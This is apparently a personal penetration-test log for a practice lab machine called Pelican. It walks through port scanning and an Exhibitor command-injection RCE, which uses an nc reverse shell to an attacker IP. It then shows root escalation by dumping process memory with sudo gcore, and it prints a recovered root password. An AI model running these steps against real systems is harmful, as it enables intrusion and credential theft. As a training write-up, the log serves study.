Pelican
π§ͺ Pentest Log: {{date:2025-08-11}}
π Target Information
- Machine Name: Pelican
- IP Address: 192.168.187.98
- Operating System: Linux
ip=192.168.187.98
π‘ Enumeration
π Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 139, 445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 631
Port 2181
Port 8080
http://192.168.187.98:8080/exhibitor/v1/ui/index.html
Google "ZooKeeper v1.0 exploit", found
https://www.exploit-db.com/exploits/48654
Port 8081
|_http-title: Did not follow redirect to http://192.168.187.98:8080/exhibitor/v1/ui/index.html
Port 44267
π£ Exploitation
π Vulnerability Summary
- Service / Port: 8080
- Vulnerability Type: RCE
π Exploit Execution
π§ Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/48654
Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
In the βjava.env scriptβ field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:
$(/bin/nc -e /bin/sh 192.168.45.163 8080 &)
Click Commit > All At Once > OK
The command may take up to a minute to execute.
python3 /home/kali/Documents/oscp/penelope/penelope.py -p 8080
𧬠Privilege Escalation
π€ Current Access
- User: charles
- Groups: charles
- Shell Type: reverse shell
π Enumeration
Sudo:
sudo -l
found root running
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
π Privilege Escalation Exploit
π Exploit Summary
- Technique Used: Sudo Abuse
- Target Binary/Service: Gcore
- Reference / Source: GTFOBins
π§ Exploit Steps
- Enumerate
ps -aux
sudo gcore 486
strings core.486
found
root:ClogKingpinInning731
- Smash to root
su -